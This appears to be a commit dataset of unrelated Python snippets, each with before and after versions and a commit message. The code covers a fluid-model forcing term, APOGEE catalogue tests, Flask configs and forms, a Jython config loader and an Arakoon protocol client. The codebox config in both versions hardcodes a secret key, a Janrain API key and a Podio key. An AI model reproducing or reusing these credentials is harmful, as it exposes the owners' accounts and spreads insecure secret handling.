b = self.state.fields("topography")
n = FacetNormal(self.state.mesh)
un = 0.5*(dot(u0, n) + abs(dot(u0, n)))
L = g*div(self.test)*b*dx - g*inner(jump(self.test, n), un('+')*b('+') - un('-')*b('-'))*dS
return L
class NoForcing(Forcing):
def _build_forcing_solver(self):
pass
def apply(self, scale, x_in, x_nl, x_out, **kwargs):
x_out.assign(x_in)
|
import numpy
import apogee.tools.read as apread
from apogee.tools import bitmask
_DATA= apread.allStar(raw=True) #such that we can re-use it in different tests
from _util import known_failure
def test_telescope():
#Test the telescope tag against the APSTAR_ID
onemIndx= numpy.array(['apogee.apo1m' in s for s in _DATA['APSTAR_ID']])
telescopeIndx= numpy.array(['apo1m' in d for d in _DATA['TELESCOPE']],
dtype='bool')
assert numpy.sum(onemIndx*(True-telescopeIndx)) == 0,\
'TELESCOPE tag does not correspond to APSTAR_ID for 1m data'
return None
def test_targflags_apogee_target1():
# Test that TARGFLAGS corresponds to the bits in APOGEE_TARGET
targ1bits= range(31) #don't check 31, bc always set
targ1bits.pop(14) #14 not populated
for targbit in targ1bits:
name= bitmask.apogee_target1_string(targbit)
targindx= numpy.array([name in s for s in _DATA['TARGFLAGS']],
dtype='bool')
if targbit == 0:
targindx*= \
numpy.array([not 'APOGEE_FAINT_EXTRA' in s for s in _DATA['TARGFLAGS']],
dtype='bool')
badindx= ((_DATA['APOGEE_TARGET1'] & 2**targbit) != 0)*(True-targindx)
assert numpy.sum(badindx) == 0, 'Some objects with bit %i set in apogee_target1 do not have the corresponding flag name in TARGFLAGS set' % targbit
return None
def test_targflags_apogee_target2():
# Test that TARGFLAGS corresponds to the bits in APOGEE_TARGET
targ2bits= [1,2,3,4,9,10,11,12,13,14,15,16,17]
for targbit in targ2bits:
name= bitmask.apogee_target2_string(targbit)
targindx= numpy.array([name in s for s in _DATA['TARGFLAGS']],
dtype='bool')
badindx= ((_DATA['APOGEE_TARGET2'] & 2**targbit) != 0)*(True-targindx)
assert numpy.sum(badindx) == 0, 'Some objects with bit %i set in apogee_target2 do not have the corresponding flag name in TARGFLAGS set' % targbit
return None
@known_failure
def test_extratarg():
#Test that extratarg tag is
# 0 for main survey targets,
# 1 for commissioning (bit 1)
# 2 for tellurics (bit 2)
mainIndx= (((_DATA['APOGEE_TARGET1'] & 2**11) != 0)\
+((_DATA['APOGEE_TARGET1'] & 2**12) != 0)
+((_DATA['APOGEE_TARGET1'] & 2**13) != 0))
assert numpy.sum(mainIndx*(_DATA['EXTRATARG'] != 0)) == 0, '%i main survey targets have EXTRATARG neq 0' % numpy.sum(mainIndx*_DATA['EXTRATARG'] > 0)
commIndx= _DATA['COMMISS'] == 1
commBitSet= numpy.array([bitmask.bit_set(1,e) for e in _DATA['EXTRATARG']],
dtype='bool')
assert numpy.sum(commIndx*(True-commBitSet)) == 0, '%i commissioning targets do not have bit 1 in EXTRATARG set' % numpy.sum(commIndx*(True-commBitSet)) == 0
tellIndx= (_DATA['APOGEE_TARGET2'] & 2**9) != 0
tellBitSet= numpy.array([bitmask.bit_set(2,e) for e in _DATA['EXTRATARG']],
dtype='bool')
assert numpy.sum(tellIndx*(True-tellBitSet)) == 0, '%i telluric targets do not have bit 2 in EXTRATARG set' % numpy.sum(tellIndx*(True-tellBitSet))
return None
test of whether the named PARAM tags agree with the PARAM array
import numpy
import apogee.tools.read as apread
from apogee.tools import bitmask, paramIndx, elemIndx
_DATA= apread.allStar(raw=True) #such that we can re-use it in different tests
from _util import known_failure
def test_telescope():
#Test the telescope tag against the APSTAR_ID
onemIndx= numpy.array(['apogee.apo1m' in s for s in _DATA['APSTAR_ID']])
telescopeIndx= numpy.array(['apo1m' in d for d in _DATA['TELESCOPE']],
dtype='bool')
assert numpy.sum(onemIndx*(True-telescopeIndx)) == 0,\
'TELESCOPE tag does not correspond to APSTAR_ID for 1m data'
return None
def test_targflags_apogee_target1():
# Test that TARGFLAGS corresponds to the bits in APOGEE_TARGET
targ1bits= range(31) #don't check 31, bc always set
targ1bits.pop(14) #14 not populated
for targbit in targ1bits:
name= bitmask.apogee_target1_string(targbit)
targindx= numpy.array([name in s for s in _DATA['TARGFLAGS']],
dtype='bool')
if targbit == 0:
targindx*= \
numpy.array([not 'APOGEE_FAINT_EXTRA' in s for s in _DATA['TARGFLAGS']],
dtype='bool')
badindx= ((_DATA['APOGEE_TARGET1'] & 2**targbit) != 0)*(True-targindx)
assert numpy.sum(badindx) == 0, 'Some objects with bit %i set in apogee_target1 do not have the corresponding flag name in TARGFLAGS set' % targbit
return None
def test_targflags_apogee_target2():
# Test that TARGFLAGS corresponds to the bits in APOGEE_TARGET
targ2bits= [1,2,3,4,9,10,11,12,13,14,15,16,17]
for targbit in targ2bits:
name= bitmask.apogee_target2_string(targbit)
targindx= numpy.array([name in s for s in _DATA['TARGFLAGS']],
dtype='bool')
badindx= ((_DATA['APOGEE_TARGET2'] & 2**targbit) != 0)*(True-targindx)
assert numpy.sum(badindx) == 0, 'Some objects with bit %i set in apogee_target2 do not have the corresponding flag name in TARGFLAGS set' % targbit
return None
@known_failure
def test_extratarg():
#Test that extratarg tag is
# 0 for main survey targets,
# 1 for commissioning (bit 1)
# 2 for tellurics (bit 2)
mainIndx= (((_DATA['APOGEE_TARGET1'] & 2**11) != 0)\
+((_DATA['APOGEE_TARGET1'] & 2**12) != 0)
+((_DATA['APOGEE_TARGET1'] & 2**13) != 0))
assert numpy.sum(mainIndx*(_DATA['EXTRATARG'] != 0)) == 0, '%i main survey targets have EXTRATARG neq 0' % numpy.sum(mainIndx*_DATA['EXTRATARG'] > 0)
commIndx= _DATA['COMMISS'] == 1
commBitSet= numpy.array([bitmask.bit_set(1,e) for e in _DATA['EXTRATARG']],
dtype='bool')
assert numpy.sum(commIndx*(True-commBitSet)) == 0, '%i commissioning targets do not have bit 1 in EXTRATARG set' % numpy.sum(commIndx*(True-commBitSet)) == 0
tellIndx= (_DATA['APOGEE_TARGET2'] & 2**9) != 0
tellBitSet= numpy.array([bitmask.bit_set(2,e) for e in _DATA['EXTRATARG']],
dtype='bool')
assert numpy.sum(tellIndx*(True-tellBitSet)) == 0, '%i telluric targets do not have bit 2 in EXTRATARG set' % numpy.sum(tellIndx*(True-tellBitSet))
return None
def test_params_named():
#Test that the named tags correspond to the correct values in param according to PARAM_SYMBOL
assert numpy.all(numpy.fabs(_DATA['PARAM'][:,paramIndx('teff')]
-_DATA['TEFF']) < 10.**-10.), 'PARAM TEFF does not correspond to tag TEFF'
assert numpy.all(numpy.fabs(_DATA['PARAM'][:,paramIndx('logg')]
-_DATA['LOGG']) < 10.**-10.), 'PARAM LOGG does not correspond to tag LOGG'
cnanIndx= (True-numpy.isnan(numpy.sqrt(_DATA['PARAM_COV'][:,paramIndx('teff'),paramIndx('teff')])))
if numpy.sum(cnanIndx) > 0:
assert numpy.all(numpy.fabs(numpy.sqrt(_DATA['PARAM_COV'][cnanIndx,paramIndx('teff'),paramIndx('teff')])
-_DATA['TEFF_ERR'][cnanIndx]) < 10.**-10.), 'PARAM_COV TEFF does not correspond to tag TEFF_ERR'
cnanIndx= (True-numpy.isnan(numpy.sqrt(_DATA['PARAM_COV'][:,paramIndx('logg'),paramIndx('logg')])))
if numpy.sum(cnanIndx) > 0:
assert numpy.all(numpy.fabs(numpy.sqrt(_DATA['PARAM_COV'][cnanIndx,paramIndx('logg'),paramIndx('logg')])
-_DATA['LOGG_ERR'][cnanIndx]) < 10.**-10.), 'PARAM_COV LOGG does not correspond to tag LOGG_ERR'
return None
|
"""
codebox.conf
~~~~~~~~~~~
:copyright: (c) 2011 DISQUS.
:license: Apache License 2.0, see LICENSE for more details.
"""
import os, os.path
class Config(object):
DEBUG = True
TESTING = False
SECRET_KEY = '\x89\x1d\xec\x8eJ\xda=C`\xf3<X\x81\xff\x1e\r{+\x1b\xe1\xd1@ku'
REDIS_DB = 0
JANRAIN_API_KEY = '288a1ca2fedb4e1d1780c320fa4082ae69640a52'
PODIO_CLIENT_ID = "dcramer@gmail.com"
PODIO_KEY = "f7qFIBcPTfTBLOd8ondkO9UGqU6uN1iG"
DOMAIN_BLACKLIST = ['gmail.com', 'hotmail.com', 'live.com', 'msn.com', 'yahoo.com', 'googlemail.com', 'facebookmail.com']
class TestingConfig(Config):
REDIS_DB = 9
TESTING = True
Handle configuration from Heroku
"""
codebox.conf
~~~~~~~~~~~
:copyright: (c) 2011 DISQUS.
:license: Apache License 2.0, see LICENSE for more details.
"""
import os, os.path
import urlparse
class Config(object):
DEBUG = True
TESTING = False
SECRET_KEY = '\x89\x1d\xec\x8eJ\xda=C`\xf3<X\x81\xff\x1e\r{+\x1b\xe1\xd1@ku'
REDIS_DB = 0
JANRAIN_API_KEY = '288a1ca2fedb4e1d1780c320fa4082ae69640a52'
PODIO_CLIENT_ID = "dcramer@gmail.com"
PODIO_KEY = "f7qFIBcPTfTBLOd8ondkO9UGqU6uN1iG"
DOMAIN_BLACKLIST = ['gmail.com', 'hotmail.com', 'live.com', 'msn.com', 'yahoo.com', 'googlemail.com', 'facebookmail.com']
if os.environ.has_key('REDISTOGO_URL'):
# 'redis://username:password@my.host:6789'
urlparse.uses_netloc.append('redis')
url = urlparse.urlparse(os.environ['REDISTOGO_URL'])
Config.REDIS_USER = url.username
Config.REDIS_PASSWORD = url.password
Config.REDIS_HOST = url.hostname
Config.REDIS_PORT = url.port
class TestingConfig(Config):
REDIS_DB = 9
TESTING = True
|
from flask.ext.wtf import Form
from wtforms import TextField, BooleanField
from wtforms.validators import Required
class LoginForm(Form):
openid = TextField('openid', validators = [Required()])
remember_me = BooleanField('remember_me', default = False)
Made the openid field a hidden field, so that the user does not have to input it
from flask.ext.wtf import Form
from wtforms import HiddenField, BooleanField
from wtforms.validators import Required
class LoginForm(Form):
openid = HiddenField('openid', validators = [Required()], default = "https://www.google.com/accounts/o8/id")
remember_me = BooleanField('remember_me', default = False) |
#!/usr/bin/env jython
import os
import ConfigParser
import logging
log = logging.getLogger('kahuna')
class Config:
""" Main configuration. """
def __init__(self):
config = ConfigParser.SafeConfigParser()
configFound = "/tmp/kahuna.conf"
# User config has precedence, then system then /usr/local
files = [os.environ['HOME'] + '/.kahuna.conf', '/etc/kahuna.conf', '/usr/local/etc/kahuna.conf']
for file in files:
if os.path.exists(file):
#some debugging
log.debug("Config found in %s" % file)
configFound = file
break
if not os.path.exists(configFound):
log.error("Kahuna config file not found.")
raise IOError("Configuration file not found. " +
"Please, make sure that $HOME/.kahuna.conf or /etc/kahuna.conf exists");
log.debug(str(os.path.exists(configFound)))
config.read(file)
self.address = config.get("connection", "address")
self.user = config.get("connection", "user")
self.password = config.get("connection", "pass")
* set default config to user config
#!/usr/bin/env jython
import os
import ConfigParser
import logging
log = logging.getLogger('kahuna')
class Config:
""" Main configuration. """
def __init__(self):
config = ConfigParser.SafeConfigParser()
configFound = os.environ['HOME'] + "/tmp/kahuna.conf"
# User config has precedence, then system then /usr/local
files = [os.environ['HOME'] + '/.kahuna.conf', '/etc/kahuna.conf', '/usr/local/etc/kahuna.conf']
for file in files:
if os.path.exists(file):
#some debugging
log.debug("Config found in %s" % file)
configFound = file
break
if not os.path.exists(configFound):
log.error("Kahuna config file not found.")
raise IOError("Configuration file not found. " +
"Please, make sure that $HOME/.kahuna.conf or /etc/kahuna.conf exists");
config.read(file)
self.address = config.get("connection", "address")
self.user = config.get("connection", "user")
self.password = config.get("connection", "pass")
|
"""
This file is part of Arakoon, a distributed key-value store. Copyright
(C) 2010 Incubaid BVBA
Licensees holding a valid Incubaid license may use this file in
accordance with Incubaid's Arakoon commercial license agreement. For
more information on how to enter into this agreement, please contact
Incubaid (contact details can be found on www.arakoon.org/licensing).
Alternatively, this file may be redistributed and/or modified under
the terms of the GNU Affero General Public License version 3, as
published by the Free Software Foundation. Under this license, this
file is distributed in the hope that it will be useful, but WITHOUT
ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
FITNESS FOR A PARTICULAR PURPOSE.
See the GNU Affero General Public License for more details.
You should have received a copy of the
GNU Affero General Public License along with this program (file "COPYING").
If not, see <http://www.gnu.org/licenses/>.
"""
"""
Module implementing the Arakoon protocol
"""
from ArakoonExceptions import *
from ArakoonValidators import SignatureValidator
from NurseryRouting import RoutingInfo
import struct
import logging
import select
import cStringIO
import types
FILTER = ''.join([(len(repr(chr(x)))==3) and chr(x) or '.' for x in range(256)])
ARA_CFG_TRY_CNT = 1
ARA_CFG_CONN_TIMEOUT = 60
ARA_CFG_CONN_BACKOFF = 5
ARA_CFG_NO_MASTER_RETRY = 60
class ArakoonClientConfig :
def __init__ (self, clusterId, nodes):
"""
Constructor of an ArakoonClientConfig object
The constructor takes one optional parameter 'nodes'.
This is a dictionary containing info on the arakoon server nodes. It contains:
- nodeids as keys
- ([ip], port) as values
e.g. ::
cfg = ArakoonClientConfig ('ricky',
{ "myFirstNode" : (["127.0.0.1"], 4000 ),
"mySecondNode" :(["127.0.0.1"], 5000 ),
"myThirdNode" :(["127.0.0.1","10.0.0.1"], 6000 )] })
@type clusterId: string
@param clusterId: name of the cluster
@type nodes: dict
@param nodes: A dictionary containing the locations for the server nodes
"""
self._clusterId = clusterId
self._nodes = self._cleanUp(nodes)
def _cleanUp(self, nodes):
for k in nodes.keys():
t = nodes[k]
maybe_string = t[0]
if type(maybe_string) == types.StringType:
ip_list = maybe_string.split(',')
port = t[1]
nodes[k] = (ip_list, port)
return nodes
def __str__(self):
r = "ArakoonClientConfig(%s,%s)" % (self._clusterId,
str(self._nodes))
return r
@staticmethod
def getNoMasterRetryPeriod() :
"""
Retrieve the period messages to the master should be retried when a master re-election occurs
This period is specified in seconds
@rtype: integer
@return: Returns the retry period in seconds
"""
return ARA_CFG_NO_MASTER_RETRY
def getNodeLocations(self, nodeId):
"""
Retrieve location of the server node with give node identifier
A location is a pair consisting of a hostname or ip address as first element.
The second element of the pair is the tcp port
@type nodeId: string
@param nodeId: The node identifier whose location you are interested in
@rtype: pair(string,int)
@return: Returns a pair with the nodes hostname or ip and the tcp port, e.g. ("127.0.0.1", 4000)
"""
return self._nodes[ nodeId ]
def getTryCount (self):
"""
Retrieve the number of attempts a message should be tried before giving up
Can be controlled by changing the global variable L{ARA_CFG_TRY_CNT}
@rtype: integer
@return: Returns the max retry count.
"""
return ARA_CFG_TRY_CNT
def getNodes(self):
"""
Retrieve the dictionary with node locations
@rtype: dict
@return: Returns a dictionary mapping the node identifiers (string) to its location ( pair<string,integer> )
"""
return self._nodes
@staticmethod
def getConnectionTimeout():
"""
Retrieve the tcp connection timeout
Can be controlled by changing the global variable L{ARA_CFG_CONN_TIMEOUT}
@rtype: integer
@return: Returns the tcp connection timeout
"""
return ARA_CFG_CONN_TIMEOUT
@staticmethod
def getBackoffInterval():
"""
Retrieves the backoff interval.
If an attempt to send a message to the server fails,
the client will wait a random number of seconds. The maximum wait time is n*getBackoffInterVal()
with n being the attempt counter.
Can be controlled by changing the global variable L{ARA_CFG_CONN_BACKOFF}
@rtype: integer
@return: The maximum backoff interval
"""
return ARA_CFG_CONN_BACKOFF
def getClusterId(self):
return self._clusterId
class ArakoonClientLogger :
@staticmethod
def logWarning( msg, *args ):
logging.warning(msg, *args )
@staticmethod
def logError( msg, *args ):
logging.error( msg, *args )
@staticmethod
def logCritical( msg, *args ):
logging.critical( msg, *args )
@staticmethod
def logDebug ( msg, *args ):
logging.debug ( msg, *args )
def dump(src, length=8):
N = 0
result = ''
while src:
s, src = src[:length], src[length:]
hexa = ' '.join(["%02X"%ord(x) for x in s])
s = s.translate(FILTER)
result += "%04X %-*s %s\n" % (N, length*3, hexa, s)
N += length
return result
# Define the size of an int in bytes
ARA_TYPE_INT64_SIZE = 8
ARA_TYPE_INT_SIZE = 4
ARA_TYPE_BOOL_SIZE = 1
# Magic used to mask each command
ARA_CMD_MAG = 0xb1ff0000
ARA_CMD_VER = 0x00000001
# Hello command
ARA_CMD_HEL = 0x00000001 | ARA_CMD_MAG
# Who is master?
ARA_CMD_WHO = 0x00000002 | ARA_CMD_MAG
# Existence of a value for a key
ARA_CMD_EXISTS = 0x00000007 | ARA_CMD_MAG
# Get a value
ARA_CMD_GET = 0x00000008 | ARA_CMD_MAG
# Update a value
ARA_CMD_SET = 0x00000009 | ARA_CMD_MAG
# Delete a key value pair
ARA_CMD_ASSERT = 0x00000016 | ARA_CMD_MAG
ARA_CMD_DEL = 0x0000000a | ARA_CMD_MAG
# Get a range of keys
ARA_CMD_RAN = 0x0000000b | ARA_CMD_MAG
# Get keys matching a prefix
ARA_CMD_PRE = 0x0000000c | ARA_CMD_MAG
# Test and set a value
ARA_CMD_TAS = 0x0000000d | ARA_CMD_MAG
# range entries
ARA_CMD_RAN_E = 0x0000000f | ARA_CMD_MAG
#sequence
ARA_CMD_SEQ = 0x00000010 | ARA_CMD_MAG
ARA_CMD_MULTI_GET = 0x00000011 | ARA_CMD_MAG
ARA_CMD_EXPECT_PROGRESS_POSSIBLE = 0x00000012 | ARA_CMD_MAG
ARA_CMD_STATISTICS = 0x00000013 | ARA_CMD_MAG
ARA_CMD_USER_FUNCTION = 0x00000015 | ARA_CMD_MAG
ARA_CMD_KEY_COUNT = 0x0000001a | ARA_CMD_MAG
ARA_CMD_CONFIRM = 0x0000001c | ARA_CMD_MAG
ARA_CMD_GET_NURSERY_CFG = 0x00000020 | ARA_CMD_MAG
ARA_CMD_REV_RAN_E = 0x00000023 | ARA_CMD_MAG
ARA_CMD_SYNCED_SEQUENCE = 0x00000024 | ARA_CMD_MAG
ARA_CMD_DELETE_PREFIX = 0x00000027 | ARA_CMD_MAG
ARA_CMD_VERSION = 0x00000028 | ARA_CMD_MAG
ARA_CMD_ASSERT_EXISTS = 0x00000029 | ARA_CMD_MAG
# Arakoon error codes
# Success
ARA_ERR_SUCCESS = 0
# No entity
ARA_ERR_NO_ENT = 1
# Node is not the master
ARA_ERR_NOT_MASTER = 4
# not found
ARA_ERR_NOT_FOUND = 5
# wrong cluster
ARA_ERR_WRONG_CLUSTER = 6
ARA_ERR_ASSERTION_FAILED = 7
ARA_ERR_RANGE_ERROR = 9
ARA_ERR_GOING_DOWN = 16
ARA_ERR_ASSERTEXISTS_FAILED = 17
NAMED_FIELD_TYPE_INT = 1
NAMED_FIELD_TYPE_INT64 = 2
NAMED_FIELD_TYPE_FLOAT = 3
NAMED_FIELD_TYPE_STRING = 4
NAMED_FIELD_TYPE_LIST = 5
def _packString( toPack ):
toPackLength = len( toPack )
return struct.pack("I%ds" % ( toPackLength), toPackLength, toPack )
def _packStringOption ( toPack = None ):
if toPack is None:
return _packBool ( 0 )
else :
return _packBool ( 1 ) + _packString (toPack)
def _packInt ( toPack ):
return struct.pack( "I", toPack )
def _packInt64 ( toPack ):
return struct.pack( "q", toPack )
def _packSignedInt ( toPack ):
return struct.pack( "i", toPack )
def _packBool ( toPack) :
return struct.pack( "?", toPack)
def sendPrologue(socket, clusterId):
p = _packInt(ARA_CMD_MAG)
p += _packInt(ARA_CMD_VER)
p += _packString(clusterId)
socket.sendall(p)
def _readExactNBytes( con, n ):
if not con._connected :
raise ArakoonSockRecvClosed()
bytesRemaining = n
tmpResult = ""
timeout = ArakoonClientConfig.getConnectionTimeout()
while bytesRemaining > 0 :
tripleList = select.select( [con._socket] , [] , [] , timeout )
if ( len ( tripleList [0]) != 0 ) :
newChunk = ""
try :
newChunk = tripleList [0][0].recv ( bytesRemaining)
except Exception, ex:
ArakoonClientLogger.logError ("Error while receiving from socket. %s: '%s'" % (ex.__class__.__name__, ex) )
con._connected = False
raise ArakoonSockRecvError()
newChunkSize = len( newChunk )
if newChunkSize == 0 :
try:
con._socket.close()
except Exception, ex:
ArakoonClientLogger.logError( "Error while closing socket. %s: %s" % (ex.__class__.__name__,ex))
con._connected = False
raise ArakoonSockReadNoBytes ()
tmpResult = tmpResult + newChunk
bytesRemaining = bytesRemaining - newChunkSize
else :
try:
con._socket.close()
except Exception, ex:
ArakoonClientLogger.logError( "Error while closing socket. %s: %s" % (ex.__class__.__name__,ex))
con._connected = False
raise ArakoonSockNotReadable()
return tmpResult
def _recvString ( con ):
strLength = _recvInt( con )
buf = _readExactNBytes( con, strLength)
return struct.unpack( "%ds" % strLength, buf ) [0]
def _unpackInt(buf, offset):
r=struct.unpack_from( "I", buf,offset)
return r[0], offset + ARA_TYPE_INT_SIZE
def _unpackSignedInt(buf, offset):
r=struct.unpack_from( "i", buf,offset)
return r[0], offset + ARA_TYPE_INT_SIZE
def _unpackInt64(buf, offset):
r= struct.unpack_from("q", buf, offset)
return r[0], offset + 8
def _unpackString(buf, offset):
size,o2 = _unpackInt(buf, offset)
v = buf[o2:o2 + size]
return v, o2+size
def _unpackStringList(buf, offset):
size,offset = _unpackInt(buf, offset)
retVal = []
for i in range( size ) :
x, offset = _unpackString(buf, offset)
retVal.append(x)
return retVal, offset
def _unpackNamedField(buf, offset):
type, offset = _unpackInt(buf, offset)
name, offset = _unpackString(buf, offset)
result = dict()
if type == NAMED_FIELD_TYPE_INT:
result[name], offset = _unpackInt(buf,offset)
return result, offset
if type == NAMED_FIELD_TYPE_INT64:
result[name], offset = _unpackInt64(buf,offset)
return result, offset
if type == NAMED_FIELD_TYPE_FLOAT:
result[name], offset = _unpackFloat(buf,offset)
return result, offset
if type == NAMED_FIELD_TYPE_STRING:
result[name], offset = _unpackString(buf,offset)
return result, offset
if type == NAMED_FIELD_TYPE_LIST:
length, offset = _unpackInt(buf,offset)
localDict = dict()
for i in range(length):
field, offset = _unpackNamedField(buf, offset)
localDict.update( field )
result[name] = localDict
return result, offset
raise ArakoonException("Cannot decode named field %s. Invalid type: %d" % (name,type) )
def _recvInt ( con ):
buf = _readExactNBytes ( con, ARA_TYPE_INT_SIZE )
i,o2 = _unpackInt(buf,0)
return i
def _recvInt64 ( con ):
buf = _readExactNBytes( con, ARA_TYPE_INT64_SIZE )
i,o2 = _unpackInt64(buf,0)
return i
def _unpackBool(buf, offset):
r = struct.unpack_from( "?", buf, offset) [0]
return r, offset+1
def _recvBool ( con ):
buf = _readExactNBytes( con, 1 )
b, o2 = _unpackBool(buf,0)
return b
def _unpackFloat(buf, offset):
r = struct.unpack_from("d", buf, offset)
return r[0], offset+8
def _recvFloat(buf):
buf = _readExactNBytes(con, 8)
f,o2 = _unpackFloat(buf,0)
return f
def _recvStringOption ( con ):
isSet = _recvBool( con )
if( isSet ) :
return _recvString( con )
else :
return None
class Update(object):
pass
class Set(Update):
def __init__(self,key,value):
self._key = key
self._value = value
def write(self, fob):
fob.write(_packInt(1))
fob.write(_packString(self._key))
fob.write(_packString(self._value))
class Delete(Update):
def __init__(self,key):
self._key = key
def write(self, fob):
fob.write(_packInt(2))
fob.write(_packString(self._key))
class Assert(Update):
def __init__(self, key, vo):
self._key = key
self._vo = vo
def write(self, fob):
fob.write(_packInt(8))
fob.write(_packString(self._key))
fob.write(_packStringOption(self._vo))
class AssertExists(Update):
def __init__(self, key):
self._key = key
def write(self, fob):
fob.write(_packInt(15))
fob.write(_packString(self._key))
class Sequence(Update):
def __init__(self):
self._updates = []
def addUpdate(self,u):
self._updates.append(u)
@SignatureValidator( 'string', 'string' )
def addSet(self, key,value):
self._updates.append(Set(key,value))
@SignatureValidator( 'string' )
def addDelete(self, key):
self._updates.append(Delete(key))
def addAssert(self, key,vo):
self._updates.append(Assert(key,vo))
def addAssertExists(self, key):
self._updates.append(AssertExists(key))
def write(self, fob):
fob.write( _packInt(5))
fob.write( _packInt(len(self._updates)))
for update in self._updates:
update.write(fob)
class ArakoonProtocol :
@staticmethod
def encodePing(clientId, clusterId ):
r = _packInt(ARA_CMD_HEL)
r += _packString(clientId)
r += _packString(clusterId)
return r
@staticmethod
def encodeGetVersion():
r = _packInt(ARA_CMD_VERSION)
return r
@staticmethod
def encodeWhoMaster():
return _packInt( ARA_CMD_WHO )
@staticmethod
def encodeExists(key, allowDirty):
msg = _packInt(ARA_CMD_EXISTS)
msg += _packBool(allowDirty)
msg += _packString(key)
return msg
@staticmethod
def encodeAssert(key, vo, allowDirty):
msg = _packInt(ARA_CMD_ASSERT)
msg += _packBool(allowDirty)
msg += _packString(key)
msg += _packStringOption(vo)
return msg
@staticmethod
def encodeAssertExists(key, allowDirty):
print "encodeAE"
msg = _packInt(ARA_CMD_ASSERT_EXISTS)
msg += _packBool(allowDirty)
msg += _packString(key)
return msg
@staticmethod
def encodeGet(key , allowDirty):
msg = _packInt(ARA_CMD_GET)
msg += _packBool(allowDirty)
msg += _packString(key)
return msg
@staticmethod
def encodeSet( key, value ):
return _packInt( ARA_CMD_SET ) + _packString( key ) + _packString ( value )
@staticmethod
def encodeConfirm(key, value):
return _packInt(ARA_CMD_CONFIRM) + _packString(key) + _packString(value)
@staticmethod
def encodeSequence(seq, sync):
r = cStringIO.StringIO()
seq.write(r)
flattened = r.getvalue()
r.close()
cmd = ARA_CMD_SEQ
if sync:
cmd = ARA_CMD_SYNCED_SEQUENCE
return _packInt(cmd) + _packString(flattened)
@staticmethod
def encodeDelete( key ):
return _packInt ( ARA_CMD_DEL ) + _packString ( key )
@staticmethod
def encodeRange( bKey, bInc, eKey, eInc, maxCnt , allowDirty):
retVal = _packInt( ARA_CMD_RAN ) + _packBool(allowDirty)
retVal += _packStringOption( bKey ) + _packBool ( bInc )
retVal += _packStringOption( eKey ) + _packBool (eInc) + _packSignedInt (maxCnt)
return retVal
@staticmethod
def encodeRangeEntries(first, finc, last, linc, maxEntries, allowDirty):
r = _packInt(ARA_CMD_RAN_E) + _packBool(allowDirty)
r += _packStringOption(first) + _packBool(finc)
r += _packStringOption(last) + _packBool(linc)
r += _packSignedInt(maxEntries)
return r
@staticmethod
def encodeReverseRangeEntries(first, finc, last, linc, maxEntries, allowDirty):
r = _packInt(ARA_CMD_REV_RAN_E) + _packBool(allowDirty)
r += _packStringOption(first) + _packBool(finc)
r += _packStringOption(last) + _packBool(linc)
r += _packSignedInt(maxEntries)
return r
@staticmethod
def encodePrefixKeys( key, maxCnt, allowDirty ):
retVal = _packInt( ARA_CMD_PRE) + _packBool(allowDirty)
retVal += _packString( key )
retVal += _packSignedInt( maxCnt )
return retVal
@staticmethod
def encodeTestAndSet( key, oldVal, newVal ):
retVal = _packInt( ARA_CMD_TAS ) + _packString( key )
retVal += _packStringOption( oldVal )
retVal += _packStringOption( newVal )
return retVal
@staticmethod
def encodeMultiGet(keys, allowDirty):
retVal = _packInt(ARA_CMD_MULTI_GET) + _packBool(allowDirty)
retVal += _packInt(len(keys))
for key in keys:
retVal += _packString(key)
return retVal
@staticmethod
def encodeExpectProgressPossible():
retVal = _packInt(ARA_CMD_EXPECT_PROGRESS_POSSIBLE)
return retVal
@staticmethod
def encodeStatistics():
retVal = _packInt(ARA_CMD_STATISTICS)
return retVal
@staticmethod
def encodeUserFunction(name, argument):
retVal = _packInt(ARA_CMD_USER_FUNCTION)
retVal += _packString(name)
retVal += _packStringOption(argument)
return retVal
@staticmethod
def encodeDeletePrefix(prefix):
retVal = _packInt(ARA_CMD_DELETE_PREFIX)
retVal += _packString(prefix)
return retVal
@staticmethod
def _evaluateErrorCode( con ):
errorCode = _recvInt ( con )
# """ ArakoonException( "Received invalid response from the server" )"""
if errorCode == ARA_ERR_SUCCESS :
return
else :
errorMsg = _recvString ( con )
if errorCode == ARA_ERR_NOT_FOUND:
raise ArakoonNotFound(errorMsg)
if errorCode == ARA_ERR_NOT_MASTER:
raise ArakoonNodeNotMaster()
if errorCode == ARA_ERR_ASSERTION_FAILED:
raise ArakoonAssertionFailed(errorMsg)
if errorCode == ARA_ERR_ASSERTEXISTS_FAILED:
raise ArakoonAssertExistsFailed(errorMsg)
if errorCode == ARA_ERR_RANGE_ERROR:
raise NurseryRangeError(errorMsg)
if errorCode == ARA_ERR_GOING_DOWN:
raise ArakoonGoingDown(errorMsg)
if errorCode != ARA_ERR_SUCCESS:
raise ArakoonException( "EC=%d. %s" % (errorCode, errorMsg) )
@staticmethod
def decodeInt64Result( con ) :
ArakoonProtocol._evaluateErrorCode( con )
return _recvInt64( con )
@staticmethod
def decodeIntResult(con):
ArakoonProtocol._evaluateErrorCode(con)
return _recvInt(con)
@staticmethod
def decodeVoidResult( con ):
ArakoonProtocol._evaluateErrorCode( con )
@staticmethod
def decodeBoolResult( con ):
ArakoonProtocol._evaluateErrorCode( con )
return _recvBool( con )
@staticmethod
def decodeStringResult ( con ):
ArakoonProtocol._evaluateErrorCode( con )
return _recvString( con )
@staticmethod
def decodeStringOptionResult ( con ):
ArakoonProtocol._evaluateErrorCode( con )
return _recvStringOption( con )
@staticmethod
def decodeStringListResult( con ):
ArakoonProtocol._evaluateErrorCode( con )
retVal = []
arraySize = _recvInt( con )
for i in range( arraySize ) :
retVal[:0] = [ _recvString( con ) ]
return retVal
@staticmethod
def decodeNurseryCfgResult( con ):
ArakoonProtocol._evaluateErrorCode(con)
offset = 0
encoded = _recvString( con )
routing, offset = RoutingInfo.unpack(encoded, offset, _unpackBool, _unpackString)
cfgCount, offset = _unpackInt(encoded, offset)
resultCfgs = {}
for i in range(cfgCount) :
clusterId, offset = _unpackString(encoded, offset)
clusterSize, offset = _unpackInt(encoded, offset)
cfg = dict()
for j in range(clusterSize):
nodeId, offset = _unpackString(encoded, offset)
ips, offset = _unpackStringList(encoded, offset)
port, offset = _unpackInt(encoded, offset)
cfg[nodeId] = (ips,port)
cliCfg = ArakoonClientConfig(clusterId, cfg)
resultCfgs[clusterId] = cliCfg
return (routing, resultCfgs)
@staticmethod
def decodeStringPairListResult(con):
ArakoonProtocol._evaluateErrorCode(con)
result = []
size = _recvInt( con )
for i in range(size):
k = _recvString ( con )
v = _recvString ( con )
result [:0] = [(k, v)]
return result
@staticmethod
def decodeStatistics(con):
ArakoonProtocol._evaluateErrorCode(con)
